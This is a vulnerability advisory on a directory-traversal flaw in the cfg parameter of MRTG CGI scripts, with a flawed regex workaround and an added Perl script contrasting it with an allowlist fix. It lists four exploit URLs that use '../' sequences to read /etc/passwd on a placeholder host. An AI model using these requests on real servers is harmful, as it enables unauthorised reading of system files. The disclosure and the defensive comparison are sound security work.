---=== UkR Security Team advisory ===---

Name : MRTG CGI script "show files" vulnerability

About : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network links. MRTG generates HTML pages containing GIF images which provide a live visual representation of this traffic.

Product vendor : MRTG / http://www.mrtg.org

Problem : The problem lies in incorrect validation of browser-submitted input. The cfg parameter of the MRTG CGI front-ends is used to build a file name without being checked for directory-traversal sequences, so a crafted request makes the script open an arbitrary file (any file readable by the web server's user) on the system where the script is installed and reveal its first line.

Workaround : This will help somewhat:

    $input =~ s/[(\.\.)|\/]//g;

Note that the pattern is a character class, so it strips every '(', '.', ')', '|' and '/' character from the input, including the dot in a legitimate name such as router.cfg. Validating cfg against an allowlist of permitted config names, and refusing anything else, is the safer fix.

Author : UkR-XblP / UkR security team

Exploit :

http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
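The following Perl script is an added example, not code from the advisory or from MRTG/14all. It runs the advisory's workaround regex and an allowlist-based check side by side over a few constructed cfg values, so the difference is visible: the character class strips the traversal, but also mangles a legitimate config name, while the allowlist accepts only a bare name and builds the path itself. The config directory /var/lib/mrtg/cfg and the function names are assumptions.

```perl
#!/usr/bin/perl
# Added example (not from the advisory or from MRTG/14all).
# Contrasts the advisory's character-class workaround with an allowlist
# check for the cfg parameter of an MRTG CGI front-end.
use strict;
use warnings;
use File::Spec;

my $CFG_DIR = '/var/lib/mrtg/cfg';   # assumed location of the .cfg files

# The advisory's workaround, verbatim. [(\.\.)|\/] is a character class,
# so it removes every '(', '.', ')', '|' and '/' character from the input.
sub advisory_workaround {
    my ($input) = @_;
    $input =~ s/[(\.\.)|\/]//g;
    return $input;
}

# Allowlist: accept only "<name>.cfg" where <name> is [A-Za-z0-9_-]+,
# then construct the path under $CFG_DIR ourselves. The regex is what
# excludes '..' and '/'; the prefix check is a defensive second layer.
sub resolve_cfg {
    my ($cfg) = @_;
    return undef unless defined $cfg && $cfg =~ /\A([A-Za-z0-9_-]+)\.cfg\z/;
    my $path  = File::Spec->catfile($CFG_DIR, "$1.cfg");
    my $canon = File::Spec->canonpath($path);   # tidies separators only
    return undef unless index($canon, "$CFG_DIR/") == 0;
    return $canon;
}

# Constructed sample inputs: one legitimate name, two traversal attempts.
my @samples = (
    'router1.cfg',
    '../../../../../../../../etc/passwd',
    '....//....//etc/passwd',
);

for my $cfg (@samples) {
    my $stripped = advisory_workaround($cfg);
    my $resolved = resolve_cfg($cfg);
    printf "%-38s workaround -> %-12s allowlist -> %s\n",
        $cfg, $stripped, defined $resolved ? $resolved : 'REJECTED';
}
```

Running it shows the traversal strings collapsing to 'etcpasswd' under the workaround (the script would then fail to open a non-existent file), but 'router1.cfg' becoming 'router1cfg', which breaks every legitimate request; the allowlist rejects both traversal strings and resolves the valid name to /var/lib/mrtg/cfg/router1.cfg.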